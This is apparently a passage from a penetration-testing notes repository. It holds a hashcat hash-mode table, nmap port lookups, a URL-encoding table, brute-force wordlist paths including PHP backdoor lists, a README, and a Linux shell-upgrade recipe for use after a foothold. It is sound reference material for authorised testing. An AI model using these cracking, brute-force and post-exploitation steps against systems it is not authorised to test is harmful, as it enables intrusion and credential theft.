             40 | md5($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
           2600 | md5(md5($pass))                                  | Raw Hash, Salted and/or Iterated
           3910 | md5(md5($pass).md5($salt))                       | Raw Hash, Salted and/or Iterated
           4400 | md5(sha1($pass))                                 | Raw Hash, Salted and/or Iterated
          20900 | md5(sha1($pass).md5($pass).sha1($pass))          | Raw Hash, Salted and/or Iterated
          21200 | md5(sha1($salt).md5($pass))                      | Raw Hash, Salted and/or Iterated
           4300 | md5(strtoupper(md5($pass)))                      | Raw Hash, Salted and/or Iterated
             30 | md5(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
            110 | sha1($pass.$salt)                                | Raw Hash, Salted and/or Iterated
            120 | sha1($salt.$pass)                                | Raw Hash, Salted and/or Iterated
           4900 | sha1($salt.$pass.$salt)                          | Raw Hash, Salted and/or Iterated
           4520 | sha1($salt.sha1($pass))                          | Raw Hash, Salted and/or Iterated
            140 | sha1($salt.utf16le($pass))                       | Raw Hash, Salted and/or Iterated
          19300 | sha1($salt1.$pass.$salt2)                        | Raw Hash, Salted and/or Iterated
          14400 | sha1(CX)                                         | Raw Hash, Salted and/or Iterated
           4700 | sha1(md5($pass))                                 | Raw Hash, Salted and/or Iterated
           4710 | sha1(md5($pass).$salt)                           | Raw Hash, Salted and/or Iterated
          21100 | sha1(md5($pass.$salt))                           | Raw Hash, Salted and/or Iterated
          18500 | sha1(md5(md5($pass)))                            | Raw Hash, Salted and/or Iterated
           4500 | sha1(sha1($pass))                                | Raw Hash, Salted and/or Iterated
            130 | sha1(utf16le($pass).$salt)                       | Raw Hash, Salted and/or Iterated
           1410 | sha256($pass.$salt)                              | Raw Hash, Salted and/or Iterated
           1420 | sha256($salt.$pass)                              | Raw Hash, Salted and/or Iterated
          22300 | sha256($salt.$pass.$salt)                        | Raw Hash, Salted and/or Iterated
           1440 | sha256($salt.utf16le($pass))                     | Raw Hash, Salted and/or Iterated
          20800 | sha256(md5($pass))                               | Raw Hash, Salted and/or Iterated
          20710 | sha256(sha256($pass).$salt)                      | Raw Hash, Salted and/or Iterated
           1430 | sha256(utf16le($pass).$salt)                     | Raw Hash, Salted and/or Iterated
           1710 | sha512($pass.$salt)                              | Raw Hash, Salted and/or Iterated
           1720 | sha512($salt.$pass)                              | Raw Hash, Salted and/or Iterated
           1740 | sha512($salt.utf16le($pass))                     | Raw Hash, Salted and/or Iterated
           1730 | sha512(utf16le($pass).$salt)                     | Raw Hash, Salted and/or Iterated
          19500 | Ruby on Rails Restful-Authentication             | Raw Hash, Salted and/or Iterated
             50 | HMAC-MD5 (key = $pass)                           | Raw Hash, Authenticated
             60 | HMAC-MD5 (key = $salt)                           | Raw Hash, Authenticated
            150 | HMAC-SHA1 (key = $pass)                          | Raw Hash, Authenticated
            160 | HMAC-SHA1 (key = $salt)                          | Raw Hash, Authenticated
           1450 | HMAC-SHA256 (key = $pass)                        | Raw Hash, Authenticated
           1460 | HMAC-SHA256 (key = $salt)                        | Raw Hash, Authenticated
           1750 | HMAC-SHA512 (key = $pass)                        | Raw Hash, Authenticated
           1760 | HMAC-SHA512 (key = $salt)                        | Raw Hash, Authenticated
          11750 | HMAC-Streebog-256 (key = $pass), big-endian      | Raw Hash, Authenticated
          11760 | HMAC-Streebog-256 (key = $salt), big-endian      | Raw Hash, Authenticated
          11850 | HMAC-Streebog-512 (key = $pass), big-endian      | Raw Hash, Authenticated
          11860 | HMAC-Streebog-512 (key = $salt), big-endian      | Raw Hash, Authenticated
          11500 | CRC32                                            | Raw Checksum
          14100 | 3DES (PT = $salt, key = $pass)                   | Raw Cipher, Known-Plaintext attack
          14000 | DES (PT = $salt, key = $pass)                    | Raw Cipher, Known-Plaintext attack
          15400 | ChaCha20                                         | Raw Cipher, Known-Plaintext attack
          14900 | Skip32 (PT = $salt, key = $pass)                 | Raw Cipher, Known-Plaintext attack
          11900 | PBKDF2-HMAC-MD5                                  | Generic KDF
          12000 | PBKDF2-HMAC-SHA1                                 | Generic KDF
          10900 | PBKDF2-HMAC-SHA256                               | Generic KDF
          12100 | PBKDF2-HMAC-SHA512                               | Generic KDF
           8900 | scrypt                                           | Generic KDF
            400 | phpass                                           | Generic KDF
          16900 | Ansible Vault                                    | Generic KDF
          12001 | Atlassian (PBKDF2-HMAC-SHA1)                     | Generic KDF
          20200 | Python passlib pbkdf2-sha512                     | Generic KDF
          20300 | Python passlib pbkdf2-sha256                     | Generic KDF
          20400 | Python passlib pbkdf2-sha1                       | Generic KDF
          16100 | TACACS+                                          | Network Protocols
          11400 | SIP digest authentication (MD5)                  | Network Protocols
           5300 | IKE-PSK MD5                                      | Network Protocols
           5400 | IKE-PSK SHA1                                     | Network Protocols
           2500 | WPA-EAPOL-PBKDF2                                 | Network Protocols
           2501 | WPA-EAPOL-PMK                                    | Network Protocols
          22000 | WPA-PBKDF2-PMKID+EAPOL                           | Network Protocols
          22001 | WPA-PMK-PMKID+EAPOL                              | Network Protocols
          16800 | WPA-PMKID-PBKDF2                                 | Network Protocols
          16801 | WPA-PMKID-PMK                                    | Network Protocols
           7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
          10200 | CRAM-MD5                                         | Network Protocols
           4800 | iSCSI CHAP authentication, MD5(CHAP)             | Network Protocols
          16500 | JWT (JSON Web Token)                             | Network Protocols
          22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols
          22301 | Telegram Mobile App Passcode (SHA256)            | Network Protocols
           7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth            | Network Protocols
          13100 | Kerberos 5, etype 23, TGS-REP                    | Network Protocols
          18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols
          19600 | Kerberos 5, etype 17, TGS-REP                    | Network Protocols
          19700 | Kerberos 5, etype 18, TGS-REP                    | Network Protocols
          19800 | Kerberos 5, etype 17, Pre-Auth                   | Network Protocols
          19900 | Kerberos 5, etype 18, Pre-Auth                   | Network Protocols
           5500 | NetNTLMv1 / NetNTLMv1+ESS                        | Network Protocols
           5600 | NetNTLMv2                                        | Network Protocols
             23 | Skype                                            | Network Protocols
          11100 | PostgreSQL CRAM (MD5)                            | Network Protocols
          11200 | MySQL CRAM (SHA1)                                | Network Protocols
           8500 | RACF                                             | Operating System
           6300 | AIX {smd5}                                       | Operating System
           6700 | AIX {ssha1}                                      | Operating System
           6400 | AIX {ssha256}                                    | Operating System
           6500 | AIX {ssha512}                                    | Operating System
           3000 | LM                                               | Operating System
          19000 | QNX /etc/shadow (MD5)                            | Operating System
          19100 | QNX /etc/shadow (SHA256)                         | Operating System
          19200 | QNX /etc/shadow (SHA512)                         | Operating System
          15300 | DPAPI masterkey file v1                          | Operating System
          15900 | DPAPI masterkey file v2                          | Operating System
           7200 | GRUB 2                                           | Operating System
          12800 | MS-AzureSync PBKDF2-HMAC-SHA256                  | Operating System
          12400 | BSDi Crypt, Extended DES                         | Operating System
           1000 | NTLM                                             | Operating System
            122 | macOS v10.4, macOS v10.5, MacOS v10.6            | Operating System
           1722 | macOS v10.7                                      | Operating System
           7100 | macOS v10.8+ (PBKDF2-SHA512)                     | Operating System
           9900 | Radmin2                                          | Operating System
           5800 | Samsung Android Password/PIN                     | Operating System
           3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating System
            500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating System
           1500 | descrypt, DES (Unix), Traditional DES            | Operating System
           7400 | sha256crypt $5$, SHA256 (Unix)                   | Operating System
           1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating System
          13800 | Windows Phone 8+ PIN/password                    | Operating System
           2410 | Cisco-ASA MD5                                    | Operating System
           9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                    | Operating System
           9300 | Cisco-IOS $9$ (scrypt)                           | Operating System
           5700 | Cisco-IOS type 4 (SHA256)                        | Operating System
           2400 | Cisco-PIX MD5                                    | Operating System
           8100 | Citrix NetScaler (SHA1)                          | Operating System
          22200 | Citrix NetScaler (SHA512)                        | Operating System
           1100 | Domain Cached Credentials (DCC), MS Cache        | Operating System
           2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2   | Operating System
           7000 | FortiGate (FortiOS)                              | Operating System
            125 | ArubaOS                                          | Operating System
            501 | Juniper IVE                                      | Operating System
             22 | Juniper NetScreen/SSG (ScreenOS)                 | Operating System
          15100 | Juniper/NetBSD sha1crypt                         | Operating System
            131 | MSSQL (2000)                                     | Database Server
            132 | MSSQL (2005)                                     | Database Server
           1731 | MSSQL (2012, 2014)                               | Database Server
             12 | PostgreSQL                                       | Database Server
           3100 | Oracle H: Type (Oracle 7+)                       | Database Server
            112 | Oracle S: Type (Oracle 11+)                      | Database Server
          12300 | Oracle T: Type (Oracle 12+)                      | Database Server
           7401 | MySQL $A$ (sha256crypt)                          | Database Server
            200 | MySQL323                                         | Database Server
            300 | MySQL4.1/MySQL5                                  | Database Server
           8000 | Sybase ASE                                       | Database Server
           1421 | hMailServer                                      | FTP, HTTP, SMTP, LDAP Server
           8300 | DNSSEC (NSEC3)                                   | FTP, HTTP, SMTP, LDAP Server
          16400 | CRAM-MD5 Dovecot                                 | FTP, HTTP, SMTP, LDAP Server
           1411 | SSHA-256(Base64), LDAP {SSHA256}                 | FTP, HTTP, SMTP, LDAP Server
           1711 | SSHA-512(Base64), LDAP {SSHA512}                 | FTP, HTTP, SMTP, LDAP Server
          10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)          | FTP, HTTP, SMTP, LDAP Server
          15000 | FileZilla Server >= 0.9.55                       | FTP, HTTP, SMTP, LDAP Server
          12600 | ColdFusion 10+                                   | FTP, HTTP, SMTP, LDAP Server
           1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | FTP, HTTP, SMTP, LDAP Server
            141 | Episerver 6.x < .NET 4                           | FTP, HTTP, SMTP, LDAP Server
           1441 | Episerver 6.x >= .NET 4                          | FTP, HTTP, SMTP, LDAP Server
            101 | nsldap, SHA-1(Base64), Netscape LDAP SHA         | FTP, HTTP, SMTP, LDAP Server
            111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA      | FTP, HTTP, SMTP, LDAP Server
           7700 | SAP CODVN B (BCODE)                              | Enterprise Application Software (EAS)
           7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE          | Enterprise Application Software (EAS)
           7800 | SAP CODVN F/G (PASSCODE)                         | Enterprise Application Software (EAS)
           7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE     | Enterprise Application Software (EAS)
          10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1              | Enterprise Application Software (EAS)
            133 | PeopleSoft                                       | Enterprise Application Software (EAS)
          13500 | PeopleSoft PS_TOKEN                              | Enterprise Application Software (EAS)
          21500 | SolarWinds Orion                                 | Enterprise Application Software (EAS)
           8600 | Lotus Notes/Domino 5                             | Enterprise Application Software (EAS)
           8700 | Lotus Notes/Domino 6                             | Enterprise Application Software (EAS)
           9100 | Lotus Notes/Domino 8                             | Enterprise Application Software (EAS)
          20600 | Oracle Transportation Management (SHA256)        | Enterprise Application Software (EAS)
           4711 | Huawei sha1(md5($pass).$salt)                    | Enterprise Application Software (EAS)
          20711 | AuthMe sha256                                    | Enterprise Application Software (EAS)
          12200 | eCryptfs                                         | Full-Disk Encryption (FDE)
          22400 | AES Crypt (SHA256)                               | Full-Disk Encryption (FDE)
          14600 | LUKS                                             | Full-Disk Encryption (FDE)
          13711 | VeraCrypt RIPEMD160 + XTS 512 bit                | Full-Disk Encryption (FDE)
          13712 | VeraCrypt RIPEMD160 + XTS 1024 bit               | Full-Disk Encryption (FDE)
          13713 | VeraCrypt RIPEMD160 + XTS 1536 bit               | Full-Disk Encryption (FDE)
          13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
          13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
          13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
          13751 | VeraCrypt SHA256 + XTS 512 bit                   | Full-Disk Encryption (FDE)
          13752 | VeraCrypt SHA256 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
          13753 | VeraCrypt SHA256 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
          13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
          13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
          13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
          13721 | VeraCrypt SHA512 + XTS 512 bit                   | Full-Disk Encryption (FDE)
          13722 | VeraCrypt SHA512 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
          13723 | VeraCrypt SHA512 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
          13771 | VeraCrypt Streebog-512 + XTS 512 bit             | Full-Disk Encryption (FDE)
          13772 | VeraCrypt Streebog-512 + XTS 1024 bit            | Full-Disk Encryption (FDE)
          13773 | VeraCrypt Streebog-512 + XTS 1536 bit            | Full-Disk Encryption (FDE)
          13731 | VeraCrypt Whirlpool + XTS 512 bit                | Full-Disk Encryption (FDE)
          13732 | VeraCrypt Whirlpool + XTS 1024 bit               | Full-Disk Encryption (FDE)
          13733 | VeraCrypt Whirlpool + XTS 1536 bit               | Full-Disk Encryption (FDE)
          16700 | FileVault 2                                      | Full-Disk Encryption (FDE)
          20011 | DiskCryptor SHA512 + XTS 512 bit                 | Full-Disk Encryption (FDE)
          20012 | DiskCryptor SHA512 + XTS 1024 bit                | Full-Disk Encryption (FDE)
          20013 | DiskCryptor SHA512 + XTS 1536 bit                | Full-Disk Encryption (FDE)
          22100 | BitLocker                                        | Full-Disk Encryption (FDE)
          12900 | Android FDE (Samsung DEK)                        | Full-Disk Encryption (FDE)
           8800 | Android FDE <= 4.3                               | Full-Disk Encryption (FDE)
          18300 | Apple File System (APFS)                         | Full-Disk Encryption (FDE)
           6211 | TrueCrypt RIPEMD160 + XTS 512 bit                | Full-Disk Encryption (FDE)
           6212 | TrueCrypt RIPEMD160 + XTS 1024 bit               | Full-Disk Encryption (FDE)
           6213 | TrueCrypt RIPEMD160 + XTS 1536 bit               | Full-Disk Encryption (FDE)
           6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
           6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
           6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
           6221 | TrueCrypt SHA512 + XTS 512 bit                   | Full-Disk Encryption (FDE)
           6222 | TrueCrypt SHA512 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
           6223 | TrueCrypt SHA512 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
           6231 | TrueCrypt Whirlpool + XTS 512 bit                | Full-Disk Encryption (FDE)
           6232 | TrueCrypt Whirlpool + XTS 1024 bit               | Full-Disk Encryption (FDE)
           6233 | TrueCrypt Whirlpool + XTS 1536 bit               | Full-Disk Encryption (FDE)
          10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                    | Documents
          10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1       | Documents
          10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2       | Documents
          10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                    | Documents
          10600 | PDF 1.7 Level 3 (Acrobat 9)                      | Documents
          10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                | Documents
           9400 | MS Office 2007                                   | Documents
           9500 | MS Office 2010                                   | Documents
           9600 | MS Office 2013                                   | Documents
           9700 | MS Office <= 2003 $0/$1, MD5 + RC4               | Documents
           9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1  | Documents
           9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2  | Documents
           9800 | MS Office <= 2003 $3/$4, SHA1 + RC4              | Documents
           9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1    | Documents
           9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2    | Documents
          18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)    | Documents
          18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents
          16200 | Apple Secure Notes                               | Documents
          15500 | JKS Java Key Store Private Keys (SHA1)           | Password Managers
           6600 | 1Password, agilekeychain                         | Password Managers
           8200 | 1Password, cloudkeychain                         | Password Managers
           9000 | Password Safe v2                                 | Password Managers
           5200 | Password Safe v3                                 | Password Managers
           6800 | LastPass + LastPass sniffed                      | Password Managers
          13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)      | Password Managers
          11300 | Bitcoin/Litecoin wallet.dat                      | Password Managers
          16600 | Electrum Wallet (Salt-Type 1-3)                  | Password Managers
          21700 | Electrum Wallet (Salt-Type 4)                    | Password Managers
          21800 | Electrum Wallet (Salt-Type 5)                    | Password Managers
          12700 | Blockchain, My Wallet                            | Password Managers
          15200 | Blockchain, My Wallet, V2                        | Password Managers
          18800 | Blockchain, My Wallet, Second Password (SHA256)  | Password Managers
          16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256     | Password Managers
          15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256              | Password Managers
          15700 | Ethereum Wallet, SCRYPT                          | Password Managers
          22500 | MultiBit Classic .key (MD5)                      | Password Managers
          11600 | 7-Zip                                            | Archives
          12500 | RAR3-hp                                          | Archives
          13000 | RAR5                                             | Archives
          17200 | PKZIP (Compressed)                               | Archives
          17220 | PKZIP (Compressed Multi-File)                    | Archives
          17225 | PKZIP (Mixed Multi-File)                         | Archives
          17230 | PKZIP (Mixed Multi-File Checksum-Only)           | Archives
          17210 | PKZIP (Uncompressed)                             | Archives
          20500 | PKZIP Master Key                                 | Archives
          20510 | PKZIP Master Key (6 byte optimization)           | Archives
          14700 | iTunes backup < 10.0                             | Archives
          14800 | iTunes backup >= 10.0                            | Archives
          13600 | WinZip                                           | Archives
          18900 | Android Backup                                   | Archives
          13200 | AxCrypt                                          | Archives
          13300 | AxCrypt in-memory SHA1                           | Archives
           8400 | WBB3 (Woltlab Burning Board)                     | Forums, CMS, E-Commerce
           2611 | vBulletin < v3.8.5                               | Forums, CMS, E-Commerce
           2711 | vBulletin >= v3.8.5                              | Forums, CMS, E-Commerce
           2612 | PHPS                                             | Forums, CMS, E-Commerce
            121 | SMF (Simple Machines Forum) > v1.1               | Forums, CMS, E-Commerce
           3711 | MediaWiki B type                                 | Forums, CMS, E-Commerce
           4521 | Redmine                                          | Forums, CMS, E-Commerce
             11 | Joomla < 2.5.18                                  | Forums, CMS, E-Commerce
          13900 | OpenCart                                         | Forums, CMS, E-Commerce
          11000 | PrestaShop                                       | Forums, CMS, E-Commerce
          16000 | Tripcode                                         | Forums, CMS, E-Commerce
           7900 | Drupal7                                          | Forums, CMS, E-Commerce
             21 | osCommerce, xt:Commerce                          | Forums, CMS, E-Commerce
           4522 | PunBB                                            | Forums, CMS, E-Commerce
           2811 | MyBB 1.2+, IPB2+ (Invision Power Board)          | Forums, CMS, E-Commerce
          18100 | TOTP (HMAC-SHA1)                                 | One-Time Passwords
           2000 | STDOUT                                           | Plaintext
          99999 | Plaintext                                        | Plaintext
          21600 | Web2py pbkdf2-sha512                             | Framework
          10000 | Django (PBKDF2-SHA256)                           | Framework
            124 | Django (SHA-1)                                   | Framework
`` Nmap

    -- Check if TCP port 8443 is in the top 500 ports (nmap ranks per protocol, so filter on /tcp; -w stops 18443 etc. from matching)
    ~$ grep '/tcp' /usr/share/nmap/nmap-services | sort -r -k3 | head -n 500 | grep -w '8443/tcp'

    -- How many top TCP ports are needed to include 9443? (the printed line number is the rank)
    ~$ grep '/tcp' /usr/share/nmap/nmap-services | sort -r -k3 | grep -nw '9443/tcp'

`` Misc

    `` Disable sleep and hibernate

        ~# systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target

`` ASCII

    -- Single-byte percent-encoding. Values >= 128 are shown as Windows-1252 glyphs and only decode this way in that charset; in UTF-8 they are multi-byte (e.g. € is %E2%82%AC)
    character   encoding    decimal
    NULL    %00 0
        %01 1
        %02 2
        %03 3
        %04 4
        %05 5
        %06 6
        %07 7
        %08 8
    TAB %09 9
    LF  %0A 10
    VT  %0B 11
    FF  %0C 12
    CR  %0D 13
        %0E 14
        %0F 15
       %10 16
       %11 17
       %12 18
       %13 19
       %14 20
       %15 21
       %16 22
       %17 23
       %18 24
       %19 25
       %1A 26
       %1B 27
       %1C 28
       %1D 29
       %1E 30
       %1F 31
    SPACE   %20 32
    !   %21 33
    "   %22 34
    #   %23 35
    $   %24 36
    %   %25 37
    &   %26 38
    '   %27 39
    (   %28 40
    )   %29 41
    *   %2A 42
    +   %2B 43
    ,   %2C 44
    -   %2D 45
    .   %2E 46
    /   %2F 47
    0   %30 48
    1   %31 49
    2   %32 50
    3   %33 51
    4   %34 52
    5   %35 53
    6   %36 54
    7   %37 55
    8   %38 56
    9   %39 57
    :   %3A 58
    ;   %3B 59
    <   %3C 60
    =   %3D 61
    >   %3E 62
    ?   %3F 63
    @   %40 64
    A   %41 65
    B   %42 66
    C   %43 67
    D   %44 68
    E   %45 69
    F   %46 70
    G   %47 71
    H   %48 72
    I   %49 73
    J   %4A 74
    K   %4B 75
    L   %4C 76
    M   %4D 77
    N   %4E 78
    O   %4F 79
    P   %50 80
    Q   %51 81
    R   %52 82
    S   %53 83
    T   %54 84
    U   %55 85
    V   %56 86
    W   %57 87
    X   %58 88
    Y   %59 89
    Z   %5A 90
    [   %5B 91
    \   %5C 92
    ]   %5D 93
    ^   %5E 94
    _   %5F 95
    `   %60 96
    a   %61 97
    b   %62 98
    c   %63 99
    d   %64 100
    e   %65 101
    f   %66 102
    g   %67 103
    h   %68 104
    i   %69 105
    j   %6A 106
    k   %6B 107
    l   %6C 108
    m   %6D 109
    n   %6E 110
    o   %6F 111
    p   %70 112
    q   %71 113
    r   %72 114
    s   %73 115
    t   %74 116
    u   %75 117
    v   %76 118
    w   %77 119
    x   %78 120
    y   %79 121
    z   %7A 122
    {   %7B 123
    |   %7C 124
    }   %7D 125
    ~   %7E 126
    DEL %7F 127
    €   %80 128
       %81 129
    ‚   %82 130
    ƒ   %83 131
    „   %84 132
    …   %85 133
    †   %86 134
    ‡   %87 135
    ˆ   %88 136
    ‰   %89 137
    Š   %8A 138
    ‹   %8B 139
    Œ   %8C 140
       %8D 141
    Ž   %8E 142
       %8F 143
       %90 144
    ‘   %91 145
    ’   %92 146
    “   %93 147
    ”   %94 148
    •   %95 149
    –   %96 150
    —   %97 151
    ˜   %98 152
    ™   %99 153
    š   %9A 154
    ›   %9B 155
    œ   %9C 156
       %9D 157
    ž   %9E 158
    Ÿ   %9F 159
        %A0 160
    ¡   %A1 161
    ¢   %A2 162
    £   %A3 163
    ¤   %A4 164
    ¥   %A5 165
    ¦   %A6 166
    §   %A7 167
    ¨   %A8 168
    ©   %A9 169
    ª   %AA 170
    «   %AB 171
    ¬   %AC 172
    ­   %AD 173
    ®   %AE 174
    ¯   %AF 175
    °   %B0 176
    ±   %B1 177
    ²   %B2 178
    ³   %B3 179
    ´   %B4 180
    µ   %B5 181
    ¶   %B6 182
    ·   %B7 183
    ¸   %B8 184
    ¹   %B9 185
    º   %BA 186
    »   %BB 187
    ¼   %BC 188
    ½   %BD 189
    ¾   %BE 190
    ¿   %BF 191
    À   %C0 192
    Á   %C1 193
    Â   %C2 194
    Ã   %C3 195
    Ä   %C4 196
    Å   %C5 197
    Æ   %C6 198
    Ç   %C7 199
    È   %C8 200
    É   %C9 201
    Ê   %CA 202
    Ë   %CB 203
    Ì   %CC 204
    Í   %CD 205
    Î   %CE 206
    Ï   %CF 207
    Ð   %D0 208
    Ñ   %D1 209
    Ò   %D2 210
    Ó   %D3 211
    Ô   %D4 212
    Õ   %D5 213
    Ö   %D6 214
    ×   %D7 215
    Ø   %D8 216
    Ù   %D9 217
    Ú   %DA 218
    Û   %DB 219
    Ü   %DC 220
    Ý   %DD 221
    Þ   %DE 222
    ß   %DF 223
    à   %E0 224
    á   %E1 225
    â   %E2 226
    ã   %E3 227
    ä   %E4 228
    å   %E5 229
    æ   %E6 230
    ç   %E7 231
    è   %E8 232
    é   %E9 233
    ê   %EA 234
    ë   %EB 235
    ì   %EC 236
    í   %ED 237
    î   %EE 238
    ï   %EF 239
    ð   %F0 240
    ñ   %F1 241
    ò   %F2 242
    ó   %F3 243
    ô   %F4 244
    õ   %F5 245
    ö   %F6 246
    ÷   %F7 247
    ø   %F8 248
    ù   %F9 249
    ú   %FA 250
    û   %FB 251
    ü   %FC 252
    ý   %FD 253
    þ   %FE 254
    ÿ   %FF 255


================================================
FILE: Notes.Wordlists.txt
================================================
`` Passwords

    `` Fast bruteforcing with typical combinations and top lists

        - ~/lib/brutas/brutas-passwords-1-xxs.txt
        - /usr/share/seclists/Passwords/probable-v2-top1575.txt
        - /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt

    `` Medium-weight, may generate too much traffic

        - ~/lib/brutas/brutas-passwords-2-xs.txt
        - ~/lib/brutas/brutas-passwords-3-s.txt
        - /usr/share/seclists/Passwords/probable-v2-top12000.txt
        - /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt

    `` Heavy lists suitable for offline bruteforcing (> 300k)

        - ~/lib/brutas/brutas-passwords-4-m.txt
        - ~/lib/brutas/brutas-passwords-5-l.txt
        - ~/lib/brutas/brutas-passwords-6-xl.txt
        - /usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt

`` Usernames

    - ~/lib/brutas/brutas-usernames-small.txt
    - ~/lib/brutas/brutas-usernames.txt
    - /usr/share/seclists/Usernames/top-usernames-shortlist.txt
    - /usr/share/wordlists/metasploit/unix_users.txt
    - /usr/share/seclists/Usernames/Names/names.txt

`` Domains

    `` Light (< 4k)

        - ~/lib/brutas/brutas-subdomains-1-small.txt
        - /usr/share/seclists/Discovery/DNS/namelist.txt
        - /usr/share/dnsenum/dns.txt

    `` Heavy (> 100k)

        - ~/lib/brutas/brutas-subdomains-2-large.txt
        - /usr/share/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
        - /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
        - /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

`` Ports

    - ~/lib/brutas/brutas-ports-tcp-http.txt
    - ~/lib/brutas/brutas-ports-tcp-public.txt
    - ~/lib/brutas/brutas-ports-tcp-internal.txt
    - /usr/share/seclists/Discovery/Infrastructure/nmap-top1000-ports.txt

`` HTTP paths

    - ~/lib/brutas/brutas-http-paths.txt
    - /usr/share/dirb/wordlists/common.txt
    - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
    - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
    - /usr/share/wfuzz/wordlist/vulns/cgis.txt
    - /usr/share/seclists/Discovery/Web-Content/CGIs.txt
    - /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
    - /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt

`` HTTP parameters

    - ~/lib/brutas/brutas-http-params.txt
    - /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt



================================================
FILE: README.md
================================================
# pentesting-cookbook

> A set of recipes useful in pentesting and red teaming scenarios

Snippets, code samples and hints used in penetration tests, stored in a single repository so they can be quickly accessed and searched during assessments.

## Structure

- `bin` Handy utilities to be run locally
- `snippets` All things useful to be run remotely, code snippets, examples etc
- `Notes.*` All sort of helpers, lists and notes not necessarily related to specific service or stage
- `Target.Host.OS.*` - Things that can be done once a foothold is established
- `Target.Host.Service.*` - Commands useful in enumeration and exploitation of particular service
- `Target.Network.*` - Commands related to scanning and moving around networks
- `Target.Recon.*` - Typical recon like DNS enumeration, OSINT etc.

## Formatting rules

* If there are more than three levels of hierarchy the file needs to be split.
* Sources (scripts) are located in the `snippets` directory (referenced by `@`).
* Conventions:
    * `~` commands
    * `@` file references
    * `-` lists
    * `--` comments (above the commented line)
    * OS specific commands:
        * `~$` (Linux, defaults to Bash)
        * `~#` (Linux - root required)
        * `~>` (Windows)
    * Shell specific commands:
        * `~PS>` (Powershell)
* Variables:
    * `VAR_ATTACKER_HOST`
    * `VAR_ATTACKER_PORT`
    * `VAR_TARGET_DOMAIN`
    * `VAR_TARGET_HOST`
    * `VAR_TARGET_PORT`
    * `VAR_TARGET_CIDR`
    * `VAR_TARGET_RANGE`
    * `VAR_TARGET_FILE`
    * `VAR_USERNAME`
    * `VAR_PASSWORD`
    * `VAR_NT_HASH`
    * `VAR_LM_HASH` (blank LM hash: aad3b435b51404eeaad3b435b51404ee)
    * `VAR_STRING`
    * `VAR_INTEGER`
    * `VAR_HEX`
    * `VAR_WORDLIST`
    * `VAR_WORDLIST_*` (`VAR_WORDLIST_USERNAME`, `VAR_WORDLIST_PASSWORD` etc)
    * `VAR_*_HOST` (`VAR_FTP_HOST`, `VAR_ZOMBIE_HOST`, `VAR_PROXY_HOST` etc)


================================================
FILE: Target.Host.OS.Linux.txt
================================================
`` Initial

    `` Upgrade

        ~$ python -c "import pty; pty.spawn('/bin/bash')"
        -- Don't forget Python 3.x might be available...
        ~$ python3 -c "import pty; pty.spawn('/bin/bash')"
        ~$ ^Z
        -- Print rows and cols to be used later (VAR_INTEGER)
        ~$ stty size
        ~$ stty raw -echo
        ~$ fg
        ~$ export SHELL=bash
        ~$ export TERM=linux
        ~$ stty rows VAR_INTEGER cols VAR_INTEGER

    `` History

